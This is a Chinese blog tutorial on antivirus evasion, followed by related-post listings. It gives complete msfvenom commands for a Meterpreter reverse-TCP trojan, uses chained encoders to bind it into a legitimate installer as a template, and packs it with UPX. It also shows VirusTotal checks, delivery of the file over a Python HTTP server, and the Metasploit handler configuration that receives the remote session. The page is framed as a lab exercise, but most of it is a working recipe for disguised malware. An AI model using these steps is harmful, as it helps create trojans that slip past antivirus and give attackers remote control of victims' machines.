13.1、免杀技术

原创 已于 2023-03-14 09:11:28 修改 · 812 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#metasploit #免杀

于 2022-12-14 09:03:47 首次发布
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2  192.168.11.134  x64 32位
免杀就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描。
由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等技术 ,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀
免杀总结一下大概有以下几种方法:
  1. 编码
  2. 加壳
  3. 先生成c源码,再编译成exe
  4. 利用工具(Veil,TheFatHat等) 14、TheFatRat木马生成工具-创建后门或payload
  

1、制作常规木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.106  LPORT=5555 -f exe -o /root/Desktop/trojans.exe
2a648d8fdd8e42b9b904703e559c1ee8.png
打开杀毒引擎网站 https://www.virustotal.com查看该病毒软件:
1e44be064197477fa1e34eff9b377493.png
可以看到,检出率很高,很容易被杀毒软件识别出。
  

2、多重编码 + 木马捆绑(主程序启动后子程序随之启动)

原理:MSF编码器,功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF编码器可以将原可执行的程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF编码器会将原始程序解码到内存中并执行。
查看msfveonom中可用的免杀编码器:msfvenom --list encoders
16784f050a1a49a58074bd42a6814255.png
这里使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码5次,接着来5次的alpha_upper编码,再来10次的countdown编码,最后使用一个百度网盘的安装包为模板进行生成才生成可执行文件。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.11.106 lport=5555  -e x86/shikata_ga_nai -i 5 -f raw | msfvenom  -a x86 --platform windows -e x86/alpha_upper -i 5 -f raw | msfvenom  -a x86 --platform windows -e x86/countdown -i 10 -f exe -x /root/Desktop/Ximalaya-3.2.0_99B_sc100001.exe -o /root/Desktop/Trojans_1.exe
  • -p:表示使用windows/meterpreter/reverse_tcp攻击载荷;
  • -e:指定编码器,可以通过-l encoders查看所有编码器
  • -i:编码次数,多次编码理论上来讲有助于免杀
  • -f:指定MSF编码器输出的程序的格式
  • -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64;
  • –platform < platform> 指定payload的目标平台;
  • -x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中。【注意】Meatsploit 自带了用于捆绑木马的程序模板,其位置在data/templates/template.exe,虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀,此处自主选择一个待捆绑程序。
2ba18b40a01340a2bbf41e6c42ccf8e4.png
打开杀毒引擎网站 https://www.virustotal.com查看该病毒软件:
fb5f96888d2342f5bcf8742803a9a9d2.png
可以看到能检测出病毒的软件减少。
  
将生成的捆绑木马发到windows主机,并且打开msf的监听模块:
用python打开一个http服务器: 
cd /home 
python -m http.server 80008
355b10f38f584531881af90d9970d9aa.png
使用命令 use exploit/multi/handler配置监听模块:
set payload windows/meterpreter/reverse_tcp  # 此处的payload一定要和上方生成的payload的是同一个模块
set lhost 192.168.11.106   # 设置监听的ip
set lport 5555   # 设置监听端口
run
靶机上执行exe程序后才会进入meterpreter会话:
fb4c05a59aa7412b83432eeaf7eccd19.png
  

3、加壳

原理:加壳是一类工具,对可执行文件中的代码和数据进行加密压缩,并将解压代码嵌入其中,当加壳的文件被运行后,解压代码会从已压缩的数据中重建原始程序并运行。UPX打包器的本质目的是反调试,防止逆向工程,而这里使用打包器的目的是为了改变后门程序的特征码。
c263257a72d64b6bb7ffb2772b011984.png
加壳:upx -5 /root/Desktop/Ximalaya-3.2.0_99B_sc100001.exe -o /root/Desktop/Trojans_2.exe
18b8f2a8389342c0bf710a05fa9007ad.png
打开杀毒引擎网站 https://www.virustotal.com查看该软件:
5969d1afba5f4027bbc4e27327632da8.png

游戏大厂业界技术全景深描:从虚拟到现实的万字解析
本博客聚焦游戏开发技巧、创业实战心得及大学热门课程干货。这里既有技术深度,也有思维广度,无论你是开发者、创业者还是高校学子,都能在这里找到适合自己的成长之路!
03-09 339
今天的游戏技术是极致创新与体验的统一体。游戏大厂既是技术领头羊,也是创意设计师。每一帧画面、每一段动作、每一个互动系统,既是工程师与美术师通力合作,也是数据和智能的产物。未来,游戏技术将进一步突破人机边界,极致沉浸、无限场景生成、玩家参与共创……这一切,都在由大厂的底层技术和始终创新的团队日夜推动。愿你在技术之旅中,不仅能见识最尖端的工业造梦科技,更能领会到虚拟世界与现实世界无穷的连结与可能。
FPS射击游戏反作弊机制万字深度解析
本博客聚焦游戏开发技巧、创业实战心得及大学热门课程干货。这里既有技术深度,也有思维广度,无论你是开发者、创业者还是高校学子,都能在这里找到适合自己的成长之路!
06-06 1540
FPS反作弊机制,不止是一套技术方案,更是一条公平之路,是开发者、运营方、玩家三者共同守护的底线。每一个精准数据分析、每一次AI模型迭代背后,都是对竞技公平和游戏精神的深度支持。未来,随着AI、数据与法律力量的发展,FPS反作弊机制将持续进化,应对从软件到硬件、从单机到云端的多维威胁。请记住,真正的游戏高手,永远不是外挂开的,而是依靠技术与智慧、团队与道德共同奋斗出来的!
工具工具工具工具
05-24
工具工具工具工具工具工具
a422100231的专栏
12-01 1196
 编辑本段什么是  单从汉语“”的字面意思来理解,可以将其看为一种能使病毒木马避毒软件查的技术。但是不得不客观地说,免杀技术的涉猎面非常广,您可以由此轻松转型为反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术,由此可见并不简单。 编辑本段的发展史  理论上讲,一定是出现在毒软件之后的。而通过毒软件的发展史不难知道,第一款毒软件kill
【kali渗透测试教程】手把手教你如何过360!网络安全零基础入门到精通教程!
最新发布
白帽阿叁的博客
10-05 957
本文介绍了免杀技术的定义、原理及分类方式,重点演示了使用MSF编码和UPX加壳的实验。实验表明,通过特定编码和加壳处理,木马文件可绕过部分毒软件的检测。然而,与反是持续对抗的过程,技术需不断更新。文章还提供了网络安全学习资源,强调技术分享仅用于合法研究和防御目的,使用者需自行承担风险。
大全
derlang的专栏
09-25 638
<br />1)用到工具:PEditor<br /><br /> 2)特点:非常简单实用,但有时还会被卡巴查。<br /><br /> 3)操作要点:用PEditor打开无壳木马程序,把原入口点加1即可。<br /><br /> 2、变化入口地址法:<br /><br /> 1)用到工具:OllyDbg,PEditor<br /><br /> 2)特点:操作也比较容易,而且效果比入口点加1点要佳。<br /><br /> 3)操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区
方式
weixin_30611509的博客
06-24 650
这三种是目前毒软件常用的毒模式。 1.文件查 毒软件对磁盘中的文件进行静态扫描,一旦发现文件带有病毒库中的病毒特征代码就给予查。(黑洞2005 服务端VS 卡巴做演示) 2.内存查 毒软件把病毒特征代码释放到内存中,然后与内存中的文件进行比对,发现有文件中带有病毒特征代码就给予查。(灰鸽子2005服务端 VS 瑞星做演示) 3.行为毒软件用木马运行后的一些特定的行为作为判断...
就是这么简单!
08-26 543
对于刚接触黑客知识的大家们来说,是一个非常遥远的话题,他们毫不怀疑的会说,以自己的水平和能力,很难把一个木马进行。那么今天,我就要告诉这些人们——其实非常简单!相信大家在仔细的阅读了本文后,就会明白我为什么要这么说了。 一、工具的准备 1、灰鸽子,灰鸽子是国内一款非常著名的木马程序,它可以说是国内木马的集大成者,其丰富而又强大的功能,灵活多变的操作,良好的隐藏...
74、恶意代码的隐蔽持久化
qsc901234567的博客
06-17 81
本文深入探讨了恶意代码如何通过隐蔽持久化技术在目标系统中长期存在并持续运行。内容涵盖隐蔽持久化的定义、实现方法、具体技术细节以及应对策略,包括环境密钥管理、隐蔽通道、动态加密后门等核心技术,并结合StuxNet、Conficker和Duqu等实际案例分析其应用。此外,文章还介绍了进一步提高系统安全性的措施,如多层次检测、逆向工程技术、内核防护等,旨在帮助读者全面了解隐蔽持久化威胁并采取有效防范手段。
NCRE全国计算机四级网络工程师
Blue_rose1688的博客
05-21 5480
使用虚拟页式存储管理时,需要在页表中增加: 页号、有效位(留位),页框号、访问位、修改位、保护位、禁止缓存位等,有效位决定是否产生缺页中断其中某进程运行时若将磁盘中的一个页面调入内存,对应页表表项中的内存块号、驻留位和访问位修改。在虚拟页式存储管理系统,调入策略、置业策略、置换策略与页面调度有关当系统采用虚拟页式存储管理方案时,需要处理:运行时决定将哪些页面装入内存运行中无空闲页框时选择置换掉某些页面将暂时不需要的页面清除出内存将进程按页框大小划分为页面创建交换分区暂存换出的页面。
Linux实用教程(第三版)
热门推荐
weixin_43133008的博客
08-27 2万+
第一章 Linux系统初步了解 本章内容 1.1 Linux系统简介 1.2 Linux系统的特点和组成 1.3 Linux版本介绍 1.4 Red Hat Linux系统概述 1.1 Linux系统简介 1.1.1 什么是Linux 1.1.2 Linux系统的产生 1.1.3 Linux系统应用领域 1.1.1什么是Linux      &...
手法 笔记 技巧
07-15
手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧手法 笔记 技巧
Ghost完全版(过国内所有主流软)
02-21
Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)Ghost完全版(过国内所有主流软)
生命在于学习——
易水哲的博客
10-25 2757
一些的知识,没有实操。
简单介绍
qq_38675102的博客
01-05 3126
简单介绍
FourEye
战神/calmness的博客
12-25 1071
生成木马 root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.raw msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > se..
】木马制作
网络安全从业者的学习笔记
03-25 3089
就是指能够使病毒木马逃避毒软件检测的一种技术。总体来讲,分为静态和动态,静态基于特征值,而动态则是基于行为。这里我们讲Cobalt Strike生成Python木马,绕过火绒。
知识汇总
goddemon
09-08 7080
veil工具基础使用+进阶 ①启动方法 ①cd /opt ② ls ③veil(运行veil即可) 使用方法 如 生成go语言的马 use 16 set lhost ip set lport 端口 generate#(执行即可) ②结合cs进行 实操(生成go语言的马) ①cs使用生成一个go语言类型的payload ②use 17 ③需要的设置变量类(具体参数设置的含义) BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试) CLICKT
【网络安全】简单的方法(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-14 5279
目录一、的概念二、系统搭建三、工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、软的查方法1、最基础的查2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是
SQlyog社区版13.1官方费下载
标题中提到的“sqlyog13.1官方社区版”直接指向了一款流行的MySQL数据库管理工具——SQLyog。SQLyog是由Webyog公司开发的一款用于MySQL数据库设计、管理和优化的图形界面工具。它提供了直观的操作界面,让数据库管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值